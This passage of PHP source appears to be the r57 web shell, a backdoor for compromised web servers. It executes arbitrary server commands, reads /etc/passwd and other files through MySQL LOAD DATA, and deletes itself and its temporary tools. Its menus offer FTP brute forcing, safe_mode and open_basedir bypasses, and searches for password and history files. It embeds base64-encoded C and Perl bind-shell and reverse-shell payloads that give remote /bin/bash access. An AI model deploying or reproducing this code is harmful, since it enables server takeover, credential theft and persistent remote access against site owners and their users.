    echo "</textarea></div></td></tr></table></div>";
   }
 echo "<br><form name=form method=POST>";
 echo in('hidden','db',0,$_POST['db']);
 echo in('hidden','db_server',0,$_POST['db_server']);
 echo in('hidden','db_port',0,$_POST['db_port']);
 echo in('hidden','mysql_l',0,$_POST['mysql_l']);
 echo in('hidden','mysql_p',0,$_POST['mysql_p']);
 echo in('hidden','mysql_db',0,$_POST['mysql_db']);
 echo in('hidden','cmd',0,'db_query');
 echo "<div align=center>";
 echo "<font face=Verdana size=-2><b>Use database: </b><input type=text name=mysql_db value=\"".$sql->base."\"></font><br>";
 echo "<textarea cols=65 rows=10 name=db_query>".(!empty($_POST['db_query'])?($_POST['db_query']):("SHOW DATABASES;"))."</textarea><br><input type=submit name=submit value=\" Run SQL query \"></div><br><br>";
 echo "<div align=center><font face=Verdana size=-2><b>Load file: </b><input type=text name=loadfile size=100 value=".(!empty($_POST['loadfile'])?($_POST['loadfile']):("/etc/passwd")).">".ws(2)."<input type=submit name=submit value=\" Load \"><br /><br />";
 echo "<b>File content</b><br><br>";
 echo "<textarea cols=121 rows=15 name=showloadfile>";
 @mysql_query("DROP TABLE IF EXISTS UnKn0wN");
 @mysql_query("CREATE TABLE `UnKn0wN` ( `file` LONGBLOB NOT NULL )");
 @mysql_query("LOAD DATA LOCAL INFILE \"".str_replace('\\','/',$_POST['loadfile'])."\" INTO TABLE UnKn0wN FIELDS TERMINATED BY '' ESCAPED BY '' LINES TERMINATED BY '\n'");
 $r = @mysql_query("SELECT * FROM UnKn0wN");
 while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); }
 @mysql_query("DROP TABLE IF EXISTS UnKn0wN");
 echo "</textarea></div>";
 echo "</form>";
 echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
 }
if(isset($_GET['delete']))
 {
   @unlink(__FILE__);
 }
if(isset($_GET['tmp']))
 {
   @unlink("/tmp/bdpl");
   @unlink("/tmp/back");
   @unlink("/tmp/bd");
   @unlink("/tmp/bd.c");
   @unlink("/tmp/dp");
   @unlink("/tmp/dpc");
   @unlink("/tmp/dpc.c");
 }
if(isset($_GET['phpini']))
{
echo $head;
function U_value($value)
 {
 if ($value == '') return '<i>no value</i>';
 if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';
 if ($value === null) return 'NULL';
 if (@is_object($value)) $value = (array) $value;
 if (@is_array($value))
 {
 @ob_start();
 print_r($value);
 $value = @ob_get_contents();
 @ob_end_clean();
 }
 return U_wordwrap((string) $value);
 }
function U_wordwrap($str)
 {
 $str = @wordwrap(@htmlspecialchars($str), 100, '<wbr />', true);
 return @preg_replace('!(&[^;]*)<wbr />([^;]*;)!', '$1$2<wbr />', $str);
 }
if (@function_exists('ini_get_all'))
 {
 $r = '';
 echo '<table width=100%>', '<tr><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#DF0000><div align=center><b>Directive</b></div></font></td><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#DF0000><div align=center><b>Local Value</b></div></font></td><td class=main bgcolor=#333333><font face=Verdana size=-2 color=#DF0000><div align=center><b>Master Value</b></div></font></td></tr>';
 foreach (@ini_get_all() as $key=>$value)
  {
  $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.$key.'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['local_value']).'</b></div></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.U_value($value['global_value']).'</b></div></font></td></tr>';
  }
 echo $r;
 echo '</table>';
 }
echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
die();
}
if(isset($_GET['cpu']))
 {
   echo $head;
   echo '<table width=100%><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2 color=#DF0000><b>CPU</b></font></div></td></tr></table><table width=100%>';
   $cpuf = @file("cpuinfo");
   if($cpuf)
    {
      $c = @sizeof($cpuf);
      for($i=0;$i<$c;$i++)
        {
          $info = @explode(":",$cpuf[$i]);
          if($info[1]==""){ $info[1]="---"; }
          $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
        }
      echo $r;
    }
   else
    {
      echo '<tr><td class=main>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
    }
   echo '</table>';
   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
   die();
 }
if(isset($_GET['mem']))
 {
   echo $head;
   echo '<table width=100%><tr><td class=main bgcolor=Black><div align=center><font face=Verdana size=-2 color=#DF0000><b>MEMORY</b></font></div></td></tr></table><table width=100%>';
   $memf = @file("meminfo");
   if($memf)
    {
      $c = sizeof($memf);
      for($i=0;$i<$c;$i++)
        {
          $info = explode(":",$memf[$i]);
          if($info[1]==""){ $info[1]="---"; }
          $r .= '<tr><td class=main>'.ws(3).'<font face=Verdana size=-2><b>'.trim($info[0]).'</b></font></td><td class=main><font face=Verdana size=-2><div align=center><b>'.trim($info[1]).'</b></div></font></td></tr>';
        }
      echo $r;
    }
   else
    {
      echo '<tr><td class=main>'.ws(3).'<div align=center><font face=Verdana size=-2><b> --- </b></font></div></td></tr>';
    }
   echo '</table>';
   echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
   die();
 }
$lang=array(
/* --------------------------------------------------------------- */
'eng_text1' =>'Executed command',
'eng_text2' =>'Execute command on server',
'eng_text3' =>'Run command',
'eng_text4' =>'Work directory',
'eng_text5' =>'Upload files on server',
'eng_text6' =>'Local file',
'eng_text7' =>'Aliases',
'eng_text8' =>'Select alias',
'eng_butt1' =>'Execute',
'eng_butt2' =>'Upload',
'eng_text9' =>'Bind port to /bin/bash',
'eng_text10'=>'Port',
'eng_text11'=>'Password for access',
'eng_butt3' =>'Bind',
'eng_text12'=>'back-connect',
'eng_text13'=>'IP',
'eng_text14'=>'Port',
'eng_butt4' =>'Connect',
'eng_text15'=>'Upload files from remote server',
'eng_text16'=>'With',
'eng_text17'=>'Remote file',
'eng_text18'=>'Local file',
'eng_text19'=>'Exploits',
'eng_text20'=>'Use',
'eng_text21'=>'&nbsp;New name',
'eng_text22'=>'datapipe',
'eng_text23'=>'Local port',
'eng_text24'=>'Remote host',
'eng_text25'=>'Remote port',
'eng_text26'=>'Use',
'eng_butt5' =>'Run',
'eng_text28'=>'Work in safe_mode',
'eng_text29'=>'ACCESS DENIED',
'eng_butt6' =>'Change',
'eng_text30'=>'Cat file',
'eng_butt7' =>'Show',
'eng_text31'=>'File not found',
'eng_text32'=>'Eval PHP code',
'eng_text33'=>'Test bypass open_basedir with cURL functions',
'eng_butt8' =>'Test',
'eng_text34'=>'Test bypass safe_mode with include function',
'eng_text35'=>'Test bypass with load file in mysql - edited by UnKn0wN',
'eng_text36'=>'Db . Table',
'eng_text37'=>'Login',
'eng_text38'=>'Password',
'eng_text39'=>'Database',
'eng_text40'=>'Dump database table',
'eng_butt9' =>'Dump',
'eng_text41'=>'Save dump in file',
'eng_text42'=>'Edit files',
'eng_text43'=>'File for edit',
'eng_butt10'=>'Save',
'eng_text44'=>'Can\'t edit file! Only read access!',
'eng_text45'=>'File saved',
'eng_text46'=>'Show phpinfo()',
'eng_text47'=>'Show variables from php.ini',
'eng_text48'=>'Delete temp files',
'eng_butt11'=>'Edit file',
'eng_text49'=>'Delete script from server',
'eng_text50'=>'View cpu info',
'eng_text51'=>'View memory info',
'eng_text52'=>'Find text',
'eng_text53'=>'In dirs',
'eng_text54'=>'Find text in files',
'eng_butt12'=>'Find',
'eng_text55'=>'Only in files',
'eng_text56'=>'Nothing :(',
'eng_text57'=>'Create/Delete File/Dir',
'eng_text58'=>'name',
'eng_text59'=>'file',
'eng_text60'=>'dir',
'eng_butt13'=>'Create/Delete',
'eng_text61'=>'File created',
'eng_text62'=>'Dir created',
'eng_text63'=>'File deleted',
'eng_text64'=>'Dir deleted',
'eng_text65'=>'Create',
'eng_text66'=>'Delete',
'eng_text67'=>'Chown/Chgrp/Chmod',
'eng_text68'=>'Command',
'eng_text69'=>'param1',
'eng_text70'=>'param2',
'eng_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",
'eng_text72'=>'Text for find',
'eng_text73'=>'Find in folder',
'eng_text74'=>'Find in files',
'eng_text75'=>'* you can use regexp',
'eng_text76'=>'Search text in files via find',
'eng_text80'=>'Type',
'eng_text81'=>'Net',
'eng_text82'=>'Databases',
'eng_text83'=>'Run SQL query',
'eng_text84'=>'SQL query',
'eng_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',
'eng_text86'=>'Download files from server',
'eng_butt14'=>'Download',
'eng_text87'=>'Download files from remote ftp-server',
'eng_text88'=>'FTP-server:port',
'eng_text89'=>'File on ftp',
'eng_text90'=>'Transfer mode',
'eng_text91'=>'Archivation',
'eng_text92'=>'without archivation',
'eng_text93'=>'FTP',
'eng_text94'=>'FTP-bruteforce',
'eng_text95'=>'Users list',
'eng_text96'=>'Can\'t get users list',
'eng_text97'=>'checked: ',
'eng_text98'=>'success: ',
'eng_text99'=>'* use username from /etc/passwd for ftp login and password',
'eng_text100'=>'Send file to remote ftp server',
'eng_text101'=>'Use reverse (user -> resu) login for password',
'eng_text102'=>'Mail',
'eng_text103'=>'Send email',
'eng_text104'=>'Send file to email',
'eng_text105'=>'To',
'eng_text106'=>'From',
'eng_text107'=>'Subj',
'eng_butt15'=>'Send',
'eng_text108'=>'Mail',
'eng_text109'=>'Hide',
'eng_text110'=>'Show',
'eng_text111'=>'SQL-Server : Port',
'eng_text112'=>'Test bypass safe_mode with function mb_send_mail',
'eng_text113'=>'Test bypass safe_mode, view dir list via imap_list',
'eng_text114'=>'Test bypass safe_mode, view file contest via imap_body',
'eng_text115'=>'Test bypass safe_mode, copy file via compress.zlib:// in function copy()',
'eng_text116'=>'Copy from',
'eng_text117'=>'to',
'eng_text118'=>'File copied',
'eng_text119'=>'Cant copy file',
'eng_text120'=>'SQL-Server',
'eng_err0'=>'Error! Can\'t write in file ',
'eng_err1'=>'Error! Can\'t read file ',
'eng_err2'=>'Error! Can\'t create ',
'eng_err3'=>'Error! Can\'t connect to ftp',
'eng_err4'=>'Error! Can\'t login on ftp server',
'eng_err5'=>'Error! Can\'t change dir on ftp',
'eng_err6'=>'Error! Can\'t sent mail',
'eng_err7'=>'Mail send',
'eng_text200'=>'read file from vul copy()',
'eng_text202'=>'where file in server',
'eng_text300'=>'read file from vul curl()',
'eng_text203'=>'read file from vul ini_restore()',
'eng_text204'=>'write shell from vul error_log()',
'eng_text205'=>'write shell in this side',
'eng_text206'=>'read dir',
'eng_text207'=>'read dir from vul reg_glob',
'eng_text208'=>'execute with function',
'eng_text209'=>'read dir from vul root',
'eng_text210'=>'DeZender ',
'eng_text211'=>'::safe_mode off::',
'eng_text212'=>'Close safe_mode with php.ini',
'eng_text213'=>'Close security_mod with .htaccess',
'eng_text214'=>'Admin name',
'eng_text215'=>'IRC server ',
'eng_text216'=>'#room name',
'eng_text217'=>'server',
'eng_text218'=>'write ini.php file to close safe_mode with ini_restore vul',
'eng_text219'=>'Get file to server in safe_mode and change name',
'eng_text220'=>'show file with symlink vul',
'eng_text221'=>'zip file in server to download',
'eng_text222'=>'2 symlink use vul',
'eng_text223'=>'read file from funcution',
'eng_text224'=>'read file from PLUGIN',
'eng_text225' => 'htaccess safemode and open_basedir bypass',
'eng_text226' => 'Write to file',
'eng_text227' => 'Content',
'eng_text228' => 'SSI safe_mode bypass',
'eng_text229' => 'COM functions safe_mode and disable_function bypass',
'eng_text230' => 'ionCube extension safe_mode bypass',
'eng_text231' => 'win32std extension safe_mode bypass',
'eng_text232' => 'win32service extension safe_mode bypass',
'eng_text233' => 'perl extension safe_mode bypass',
'eng_text234' => 'FFI extension safe_mode bypass',
'eng_butt65'=>'Write',
);
/*
?????? ??????
????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )
?? ?????? ???? ????????? ??? ???????? ???????.
*/
$aliases=array(
'find suid files'=>'find / -type f -perm -04000 -ls',
'find suid files in current dir'=>'find . -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',
'find config.inc.php files'=>'find / -type f -name config.inc.php',
'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',
'find config* files'=>'find / -type f -name "config*"',
'find config* files in current dir'=>'find . -type f -name "config*"',
'find all writable files'=>'find / -type f -perm -2 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories'=>'find /  -type d -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files'=>'find / -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'find all service.pwd files'=>'find / -type f -name service.pwd',
'find service.pwd files in current dir'=>'find . -type f -name service.pwd',
'find all .htpasswd files'=>'find / -type f -name .htpasswd',
'find .htpasswd files in current dir'=>'find . -type f -name .htpasswd',
'find all .bash_history files'=>'find / -type f -name .bash_history',
'find .bash_history files in current dir'=>'find . -type f -name .bash_history',
'find all .mysql_history files'=>'find / -type f -name .mysql_history',
'find .mysql_history files in current dir'=>'find . -type f -name .mysql_history',
'find all .fetchmailrc files'=>'find / -type f -name .fetchmailrc',
'find .fetchmailrc files in current dir'=>'find . -type f -name .fetchmailrc',
'list file attributes on a Linux second extended file system'=>'lsattr -va',
'show opened ports'=>'netstat -an | grep -i listen',
'----------------------------------------------------------------------------------------------------'=>'ls -la'
);
$table_up1  = "<tr><td class=main bgcolor=Black
><font face=Verdana size=-2><b><div class=tt align=center>:: ";
$table_up2  = " ::</div></b></font></td></tr><tr><td class=main>";
$table_up3  = "<table width=100% cellpadding=0 cellspacing=0 bgcolor=Black><tr><td class=main>";
$table_end1 = "</td></tr>";
$arrow = " <font face=Webdings color=#DF0000>4</font>";
$lb = "<font color=#DF0000>[</font>";
$rb = "<font color=#DF0000>]</font>";
$font = "<font face=Verdana size=-2>";
$ts = "<table class=table1 width=100% align=center>";
$te = "</table>";
$fs = "<form name=form method=POST>";
$fe = "</form>";

if(isset($_GET['users']))
 {
 echo $head;
 if(!$users=get_users()) { echo "<center><font face=Verdana size=-2 color=#DF0000>".$lang[$language.'_text96']."</font></center>"; }
 else
  {
  echo '<center><textarea cols=20 rows=20>';
  foreach($users as $user) { echo $user."\n"; }
  echo '</textarea></center>';
  }
 echo "<div align=center><br><b><a href=".$_SERVER['PHP_SELF']."?brute&page=crack><font size=5 color=Red>BRUTE IT!</font></b></a><br><br><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>"; die();
 }

if (!empty($_POST['dir'])) { @chdir($_POST['dir']); }
$dir = @getcwd();
$unix = 0;
if(strlen($dir)>1 && $dir[1]==":") $unix=0; else $unix=1;
if(empty($dir))
 {
 $os = getenv('OS');
 if(empty($os)){ $os = php_uname(); }
 if(empty($os)){ $os ="-"; $unix=1; }
 else
    {
    if(@eregi("^win",$os)) { $unix = 0; }
    else { $unix = 1; }
    }
 }
if(!empty($_POST['s_dir']) && !empty($_POST['s_text']) && !empty($_POST['cmd']) && $_POST['cmd'] == "search_text")
  {
    echo $head;
    if(!empty($_POST['s_mask']) && !empty($_POST['m'])) { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text'],$_POST['s_mask']); }
    else { $sr = new SearchResult($_POST['s_dir'],$_POST['s_text']); }
    $sr->SearchText(0,0);
    $res = $sr->GetResultFiles();
    $found = $sr->GetMatchesCount();
    $titles = $sr->GetTitles();
    $r = "";
    if($found > 0)
    {
      $r .= "<TABLE width=100%>";
      foreach($res as $file=>$v)
      {
        $r .= "<TR>";
        $r .= "<TD class=main colspan=2><font face=Verdana size=-2><b>".ws(3);
        $r .= (!$unix)? str_replace("/","\\",$file) : $file;
        $r .= "</b></font></ TD>";
        $r .= "</TR>";
        foreach($v as $a=>$b)
        {
          $r .= "<TR>";
          $r .= "<TD class=main align=center><B><font face=Verdana size=-2>".$a."</font></B></TD>";
          $r .= "<TD class=main><font face=Verdana size=-2>".ws(2).$b."</font></TD>";
          $r .= "</TR>\n";
        }
      }
      $r .= "</TABLE>";
    echo $r;
    }
    else
    {
      echo "<P align=center><B><font face=Verdana size=-2>".$lang[$language.'_text56']."</B></font></P>";
    }
  echo "<br><div align=center><font face=Verdana size=-2><b>[ <a href=".$_SERVER['PHP_SELF'].">BACK</a> ]</b></font></div>";
  die();
  }
if(!$safe_mode && strpos(ex("echo abcr57"),"r57")!=3) { $safe_mode = 1; }
$SERVER_SOFTWARE = getenv('SERVER_SOFTWARE');
if(empty($SERVER_SOFTWARE)){ $SERVER_SOFTWARE = "-"; }
function ws($i)
{
return @str_repeat("&nbsp;",$i);
}
function ex($cfe)
{
 $res = '';
 if (!empty($cfe))
 {
  if(function_exists('exec'))
   {
    @exec($cfe,$res);
    $res = join("\n",$res);
   }
  elseif(function_exists('shell_exec'))
   {
    $res = @shell_exec($cfe);
   }
  elseif(function_exists('system'))
   {
    @ob_start();
    @system($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(function_exists('passthru'))
   {
    @ob_start();
    @passthru($cfe);
    $res = @ob_get_contents();
    @ob_end_clean();
   }
  elseif(@is_resource($f = @popen($cfe,"r")))
  {
   $res = "";
   while(!@feof($f)) { $res .= @fread($f,1024); }
   @pclose($f);
  }
 }
 return $res;
}
function get_users()
{
  $users = array();
if (file_exists('passwd.txt')) {
 $rows=file('passwd.txt');
  } else {
 $rows=file('/etc/passwd');
  }
  if(!$rows) return 0;
  foreach ($rows as $string)
   {
   	$user = @explode(":",$string);
   	if(substr($string,0,1)!='#') array_push($users,$user[0]);
   }
  return $users;
}
function err($n,$txt='')
{
echo '<table width=100% cellpadding=0 cellspacing=0><tr><td class=main bgcolor=Black><font color=Red face=Verdana size=-2><div align=center><b>';
echo $GLOBALS['lang'][$GLOBALS['language'].'_err'.$n];
if(!empty($txt)) { echo " $txt"; }
echo '</b></div></font></td></tr></table>';
return null;
}
function perms($mode)
{
if (!$GLOBALS['unix']) return 0;
if( $mode & 0x1000 ) { $type='p'; }
else if( $mode & 0x2000 ) { $type='c'; }
else if( $mode & 0x4000 ) { $type='d'; }
else if( $mode & 0x6000 ) { $type='b'; }
else if( $mode & 0x8000 ) { $type='-'; }
else if( $mode & 0xA000 ) { $type='l'; }
else if( $mode & 0xC000 ) { $type='s'; }
else $type='u';
$owner["read"] = ($mode & 00400) ? 'r' : '-';
$owner["write"] = ($mode & 00200) ? 'w' : '-';
$owner["execute"] = ($mode & 00100) ? 'x' : '-';
$group["read"] = ($mode & 00040) ? 'r' : '-';
$group["write"] = ($mode & 00020) ? 'w' : '-';
$group["execute"] = ($mode & 00010) ? 'x' : '-';
$world["read"] = ($mode & 00004) ? 'r' : '-';
$world["write"] = ($mode & 00002) ? 'w' : '-';
$world["execute"] = ($mode & 00001) ? 'x' : '-';
if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
$s=sprintf("%1s", $type);
$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
return trim($s);
}
function in($type,$name,$size,$value,$checked=0)
{
 $ret = "<input type=".$type." name=".$name." ";
 if($size != 0) { $ret .= "size=".$size." "; }
 $ret .= "value=\"".$value."\"";
 if($checked) $ret .= " checked";
 return $ret.">";
}
function which($pr)
{
$path = ex("which $pr");
if(!empty($path)) { return $path; } else { return $pr; }
}
function cf($fname,$text)
{
 $w_file=@fopen($fname,"w") or err(0);
 if($w_file)
 {
 @fputs($w_file,base64_decode($text));
 @fclose($w_file);
 }
}
function sr($l,$t1,$t2)
 {
 return "<tr class=tr1><td class=td1 width=".$l."% align=right>".$t1."</td><td class=td1 align=left>".$t2."</td></tr>";
 }
if (!@function_exists("view_size"))
{
function view_size($size)
{
 if($size >= 1073741824) {$size = @round($size / 1073741824 * 100) / 100 . " GB";}
 elseif($size >= 1048576) {$size = @round($size / 1048576 * 100) / 100 . " MB";}
 elseif($size >= 1024) {$size = @round($size / 1024 * 100) / 100 . " KB";}
 else {$size = $size . " B";}
 return $size;
}
}
  function DirFilesR($dir,$types='')
  {
    $files = Array();
    if(($handle = @opendir($dir)))
    {
      while (false !== ($file = @readdir($handle)))
      {
        if ($file != "." && $file != "..")
        {
          if(@is_dir($dir."/".$file))
            $files = @array_merge($files,DirFilesR($dir."/".$file,$types));
          else
          {
            $pos = @strrpos($file,".");
            $ext = @substr($file,$pos,@strlen($file)-$pos);
            if($types)
            {
              if(@in_array($ext,explode(';',$types)))
                $files[] = $dir."/".$file;
            }
            else
              $files[] = $dir."/".$file;
          }
        }
      }
      @closedir($handle);
    }
    return $files;
  }
  class SearchResult
  {
    var $text;
    var $FilesToSearch;
    var $ResultFiles;
    var $FilesTotal;
    var $MatchesCount;
    var $FileMatschesCount;
    var $TimeStart;
    var $TimeTotal;
    var $titles;
    function SearchResult($dir,$text,$filter='')
    {
      $dirs = @explode(";",$dir);
      $this->FilesToSearch = Array();
      for($a=0;$a<count($dirs);$a++)
        $this->FilesToSearch = @array_merge($this->FilesToSearch,DirFilesR($dirs[$a],$filter));
      $this->text = $text;
      $this->FilesTotal = @count($this->FilesToSearch);
      $this->TimeStart = getmicrotime();
      $this->MatchesCount = 0;
      $this->ResultFiles = Array();
      $this->FileMatchesCount = Array();
      $this->titles = Array();
    }
    function GetFilesTotal() { return $this->FilesTotal; }
    function GetTitles() { return $this->titles; }
    function GetTimeTotal() { return $this->TimeTotal; }
    function GetMatchesCount() { return $this->MatchesCount; }
    function GetFileMatchesCount() { return $this->FileMatchesCount; }
    function GetResultFiles() { return $this->ResultFiles; }
    function SearchText($phrase=0,$case=0) {
    $qq = @explode(' ',$this->text);
    $delim = '|';
      if($phrase)
        foreach($qq as $k=>$v)
          $qq[$k] = '\b'.$v.'\b';
      $words = '('.@implode($delim,$qq).')';
      $pattern = "/".$words."/";
      if(!$case)
        $pattern .= 'i';
      foreach($this->FilesToSearch as $k=>$filename)
      {
        $this->FileMatchesCount[$filename] = 0;
        $FileStrings = @file($filename) or @next;
        for($a=0;$a<@count($FileStrings);$a++)
        {
          $count = 0;
          $CurString = $FileStrings[$a];
          $CurString = @Trim($CurString);
          $CurString = @strip_tags($CurString);
          $aa = '';
          if(($count = @preg_match_all($pattern,$CurString,$aa)))
          {
            $CurString = @preg_replace($pattern,"<SPAN style='color: #990000;'><b>\\1</b></SPAN>",$CurString);
            $this->ResultFiles[$filename][$a+1] = $CurString;
            $this->MatchesCount += $count;
            $this->FileMatchesCount[$filename] += $count;
          }
        }
      }
      $this->TimeTotal = @round(getmicrotime() - $this->TimeStart,4);
    }
  }
  function getmicrotime()
  {
    list($usec,$sec) = @explode(" ",@microtime());
    return ((float)$usec + (float)$sec);
  }
$port_bind_bd_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3RyaW5nLmg+DQojaW5jbHVkZSA8c3lzL3R5cGVzLmg+DQojaW5jbHVkZS
A8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCiNpbmNsdWRlIDxlcnJuby5oPg0KaW50IG1haW4oYXJnYyxhcmd2KQ0KaW50I
GFyZ2M7DQpjaGFyICoqYXJndjsNCnsgIA0KIGludCBzb2NrZmQsIG5ld2ZkOw0KIGNoYXIgYnVmWzMwXTsNCiBzdHJ1Y3Qgc29ja2FkZHJfaW4gcmVt
b3RlOw0KIGlmKGZvcmsoKSA9PSAwKSB7IA0KIHJlbW90ZS5zaW5fZmFtaWx5ID0gQUZfSU5FVDsNCiByZW1vdGUuc2luX3BvcnQgPSBodG9ucyhhdG9
pKGFyZ3ZbMV0pKTsNCiByZW1vdGUuc2luX2FkZHIuc19hZGRyID0gaHRvbmwoSU5BRERSX0FOWSk7IA0KIHNvY2tmZCA9IHNvY2tldChBRl9JTkVULF
NPQ0tfU1RSRUFNLDApOw0KIGlmKCFzb2NrZmQpIHBlcnJvcigic29ja2V0IGVycm9yIik7DQogYmluZChzb2NrZmQsIChzdHJ1Y3Qgc29ja2FkZHIgK
ikmcmVtb3RlLCAweDEwKTsNCiBsaXN0ZW4oc29ja2ZkLCA1KTsNCiB3aGlsZSgxKQ0KICB7DQogICBuZXdmZD1hY2NlcHQoc29ja2ZkLDAsMCk7DQog
ICBkdXAyKG5ld2ZkLDApOw0KICAgZHVwMihuZXdmZCwxKTsNCiAgIGR1cDIobmV3ZmQsMik7DQogICB3cml0ZShuZXdmZCwiUGFzc3dvcmQ6IiwxMCk
7DQogICByZWFkKG5ld2ZkLGJ1ZixzaXplb2YoYnVmKSk7DQogICBpZiAoIWNocGFzcyhhcmd2WzJdLGJ1ZikpDQogICBzeXN0ZW0oImVjaG8gd2VsY2
9tZSB0byByNTcgc2hlbGwgJiYgL2Jpbi9iYXNoIC1pIik7DQogICBlbHNlDQogICBmcHJpbnRmKHN0ZGVyciwiU29ycnkiKTsNCiAgIGNsb3NlKG5ld
2ZkKTsNCiAgfQ0KIH0NCn0NCmludCBjaHBhc3MoY2hhciAqYmFzZSwgY2hhciAqZW50ZXJlZCkgew0KaW50IGk7DQpmb3IoaT0wO2k8c3RybGVuKGVu
dGVyZWQpO2krKykgDQp7DQppZihlbnRlcmVkW2ldID09ICdcbicpDQplbnRlcmVkW2ldID0gJ1wwJzsgDQppZihlbnRlcmVkW2ldID09ICdccicpDQp
lbnRlcmVkW2ldID0gJ1wwJzsNCn0NCmlmICghc3RyY21wKGJhc2UsZW50ZXJlZCkpDQpyZXR1cm4gMDsNCn0=";
$port_bind_bd_pl="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vYmFzaCAtaSI7DQppZiAoQEFSR1YgPCAxKSB7IGV4aXQoMSk7IH0NCiRMS
VNURU5fUE9SVD0kQVJHVlswXTsNCnVzZSBTb2NrZXQ7DQokcHJvdG9jb2w9Z2V0cHJvdG9ieW5hbWUoJ3RjcCcpOw0Kc29ja2V0KFMsJlBGX0lORVQs
JlNPQ0tfU1RSRUFNLCRwcm90b2NvbCkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVV
TRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJExJU1RFTl9QT1JULElOQUREUl9BTlkpKSB8fCBkaWUgIkNhbnQgb3BlbiBwb3J0XG4iOw0KbG
lzdGVuKFMsMykgfHwgZGllICJDYW50IGxpc3RlbiBwb3J0XG4iOw0Kd2hpbGUoMSkNCnsNCmFjY2VwdChDT05OLFMpOw0KaWYoISgkcGlkPWZvcmspK
Q0Kew0KZGllICJDYW5ub3QgZm9yayIgaWYgKCFkZWZpbmVkICRwaWQpOw0Kb3BlbiBTVERJTiwiPCZDT05OIjsNCm9wZW4gU1RET1VULCI+JkNPTk4i
Ow0Kb3BlbiBTVERFUlIsIj4mQ09OTiI7DQpleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCmNsb3N
lIENPTk47DQpleGl0IDA7DQp9DQp9";
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj
aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR
hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT
sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI
kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi
KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl
OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
$back_connect_c="I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC
